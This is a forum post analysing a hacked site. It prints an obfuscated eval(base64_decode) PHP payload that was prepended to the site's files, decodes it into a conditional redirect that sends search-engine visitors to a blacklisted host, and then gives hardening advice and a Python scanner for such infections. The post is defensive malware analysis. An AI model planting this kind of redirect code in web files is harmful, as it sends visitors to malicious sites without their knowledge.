by KK » Sat Mar 24, 2012 9:35 pm
@ntoupin
Some news for you.
The owner of http://www.arsenicdesignlab.com responded and graciously allowed me access to the site.
As suspected, this is what I found -
Almost every PHP file on his site had this obfuscated code prepended to it
Code:
eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw
0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9T
RVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0
lFIDcuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwi
YmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb2
dvIikgb3Igc3RyaXN0cigkcmVmZXJlciwibGl2ZS5jb20iKW9yIHN0cmlzdHIoJHJlZmVyZXIsImFwb3J0
Iikgb3Igc3RyaXN0cigkcmVmZXJlciwibmlnbWEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ3ZWJhbHRhIi
kgb3Igc3RyaXN0cigkcmVmZXJlciwiYmVndW4ucnUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJzdHVtYmxl
dXBvbi5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLC
J0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwm
bHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcm
VmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVy
LCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaX
N0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIo
IkxvY2F0aW9uOiBodHRwOi8vZ2lnb3AuYW1lcmljYW51bmZpbmlzaGVkLmNvbS8iKTsNCmV4aXQoKTsNCn
0KfQp9DQp9DQp9"));
Decoded, the bytes above become
Code:
error_reporting(0);                          // suppress any PHP errors the payload itself might raise
$qazplm=headers_sent();
if (!$qazplm){                               // only act while a redirect header can still be sent
    $referer=$_SERVER['HTTP_REFERER'];
    $uag=$_SERVER['HTTP_USER_AGENT'];
    if ($uag) {
        if (!stristr($uag,"MSIE 7.0")){      // IE 7 visitors are left alone
            // fire only for visitors arriving from search engines, social sites or URL shorteners
            if (stristr($referer,"yahoo") or
                stristr($referer,"bing") or
                stristr($referer,"rambler") or
                stristr($referer,"gogo") or
                stristr($referer,"live.com") or
                stristr($referer,"aport") or
                stristr($referer,"nigma") or
                stristr($referer,"webalta") or
                stristr($referer,"begun.ru") or
                stristr($referer,"stumbleupon.com") or
                stristr($referer,"bit.ly") or
                stristr($referer,"tinyurl.com") or
                preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or
                preg_match ("/google\.(.*?)\/url\?sa/",$referer) or
                stristr($referer,"myspace.com") or
                stristr($referer,"facebook.com") or
                stristr($referer,"aol.com")) {
                // skip referrals from cached copies or site-search queries
                if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
                    header("Location: http://gigop.americanunfinished.com/");
                    exit();
                }
            }
        }
    }
}
As can be seen, the injected code is a 'Conditional redirect malware' and is supposed to redirect users visiting the site through search-engines to http://gigop.americanunfinished.com/ (a black-listed site).
As it happens, Couch's files are Ioncube encoded and the addition of the code only serves to make Ioncube detect that the file has been tampered with and throw the 'File corrupted' error you reported.
In all probability, that is what is happening on your site too.
Although the condition really is unrelated to Couch (a quick Google search will reveal that Wordpress and Joomla are the ones most affected), it would be proper to discuss ways of preventing this from happening -
http://redleg-redleg.blogspot.in/2012/0 ... ee-pl.html discusses this very exploit in detail and has a few good tips worth emulating. A few quotes from the site
Most hacked sites I see are due to compromised passwords. Start by doing a scan of your PC and make sure there are no Trojans/viruses capturing your ids/passwords; use a couple of different security packages. Change ALL passwords, especially FTP. Never store/save your passwords in your FTP client; use secure FTP if available. Install a good anti-virus program and do regular scans of your computer. Your hosting service may be able to help you pin it down: if you notify them when you see any changes, they could check the access logs and maybe determine the account being used when the files are modified.
The second most common thing I see is problems with file/folder permissions. The hackers get access to a site and open the file permissions up on a folder/file so they can continue to get access even if you change passwords etc. You'll see different views on what permissions should be; I go with Files set to 644, Folders set to 755. It is a good idea to regularly check file/folder permissions.
Make sure you are running the latest versions and security patches of all software, CMS, Plugins, themes etc.
Frequently I also see hackers leave a backdoor on a site. This is usually a php file hidden away somewhere with system files, /cgi-bin/ used to be a popular place. This will be a php file that is not part of your site and it will contain a bunch of obfuscated stuff. There is an excellent article with some tips on how to find a backdoor from 25 Years of Programming -- Website security: How to find backdoor PHP shell scripts on a server.
If you have not already done so, I suggest you start by scanning your PC for trojans etc., then change all passwords and make sure your FTP account is not compromised. Check all folder/file permissions and make sure they are locked down.
And as a word of caution, do NOT use Filezilla FTP client to transfer the files. It stores all passwords in plain text format, so if your PC gets compromised your passwords stored in it will get stolen as well.
Hope this helps.
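As an added example (this is not part of KK's post, nor CouchCMS code), here is a small Python scanner that does two of the checks discussed above on a web root: it finds PHP files carrying an eval(base64_decode("...")) wrapper, decodes the blob and reports the conditional-redirect indicators and redirect targets inside it, and it flags files/folders whose permissions are wider than the 644/755 the quoted advice recommends. The web root it scans is a constructed sample tree written to a temporary directory (with a placeholder redirect domain), so it runs offline; point scan_tree() at a real document root to use it.

```python
"""Scan a web root for eval(base64_decode(...)) prepends and loose permissions.
Added example; the sample tree and redirect target are constructed, not real."""
import base64
import os
import re
import stat
import tempfile
from pathlib import Path
from typing import Optional

# The obfuscation wrapper. The blob may be wrapped across lines (as in the forum
# paste), so whitespace is allowed inside the capture group.
PREPEND_RE = re.compile(
    r'eval\s*\(\s*base64_decode\s*\(\s*["\']([A-Za-z0-9+/=\s]+)["\']\s*\)\s*\)'
)

# Strings that together characterise a conditional-redirect payload.
INDICATORS = (
    "error_reporting(0)",   # silence PHP errors
    "headers_sent",         # make sure a redirect header can still be sent
    "HTTP_REFERER",         # act only on search-engine / social referrals
    "HTTP_USER_AGENT",      # user-agent filtering
    "Location:",            # the redirect itself
)

REDIRECT_RE = re.compile(r'header\s*\(\s*["\']Location:\s*([^"\']+)["\']')


def decode_payload(blob: str) -> Optional[str]:
    """Decode the base64 blob after stripping any line breaks; None if it is not valid base64."""
    try:
        return base64.b64decode("".join(blob.split())).decode("latin-1")
    except ValueError:
        return None


def scan_php_source(source: str) -> Optional[dict]:
    """Return a finding for one PHP file's text, or None if no wrapper is present."""
    m = PREPEND_RE.search(source)
    if m is None:
        return None
    decoded = decode_payload(m.group(1)) or ""
    return {
        "prepended": m.start() < 64,   # wrapper sits at the top of the file, as in the post
        "indicators": [i for i in INDICATORS if i in decoded],
        "redirect_targets": REDIRECT_RE.findall(decoded),
        "decoded": decoded,
    }


def check_mode(path: Path) -> Optional[str]:
    """Flag anything looser than 644 (files) / 755 (directories)."""
    mode = stat.S_IMODE(path.lstat().st_mode)
    expected = 0o755 if path.is_dir() else 0o644
    if mode & ~expected:   # any permission bit set beyond the expected set
        return f"{path}: mode {mode:o} wider than {expected:o}"
    return None


def scan_tree(root: Path) -> dict:
    """Walk the web root; collect infected PHP files and over-permissive paths."""
    findings = {"infected": {}, "permissions": []}
    for dirpath, dirnames, filenames in os.walk(root):
        d = Path(dirpath)
        for name in dirnames:
            problem = check_mode(d / name)
            if problem:
                findings["permissions"].append(problem)
        for name in filenames:
            f = d / name
            problem = check_mode(f)
            if problem:
                findings["permissions"].append(problem)
            if f.suffix.lower() in (".php", ".inc", ".phtml"):
                result = scan_php_source(f.read_text(encoding="latin-1", errors="replace"))
                if result:
                    findings["infected"][str(f.relative_to(root))] = result
    return findings


# Constructed payload with the same shape as the decoded code in the post;
# the redirect target is a placeholder, not a real site.
CONSTRUCTED_PAYLOAD = """
error_reporting(0);
if (!headers_sent()) {
  $referer = $_SERVER['HTTP_REFERER'];
  if (stristr($referer, "example-search")) {
    header("Location: http://redirect.invalid/");
    exit();
  }
}
"""


def build_sample_tree() -> Path:
    """Write a constructed web root: one infected file, one clean file, one 777 folder."""
    root = Path(tempfile.mkdtemp(prefix="webroot_"))
    blob = base64.b64encode(CONSTRUCTED_PAYLOAD.encode()).decode()
    wrapped = "\n".join(blob[i:i + 76] for i in range(0, len(blob), 76))  # paste-style wrapping
    (root / "index.php").write_text(f'<?php eval(base64_decode("{wrapped}"));?>\n<?php echo "site"; ?>\n')
    (root / "index.php").chmod(0o644)
    (root / "clean.php").write_text('<?php echo "hello"; ?>\n')
    (root / "clean.php").chmod(0o644)
    (root / "uploads").mkdir()
    (root / "uploads").chmod(0o777)
    return root


if __name__ == "__main__":
    report = scan_tree(build_sample_tree())
    for path, finding in report["infected"].items():
        print(f"INFECTED {path}: indicators={finding['indicators']} redirects={finding['redirect_targets']}")
    for line in report["permissions"]:
        print("PERMS", line)
```

The decoder deliberately strips whitespace before decoding, because the pasted blob in the post is wrapped at 76 columns; the prepend test (wrapper within the first 64 bytes) matches how the infection in the post was placed, but a wrapper anywhere in a file is still reported.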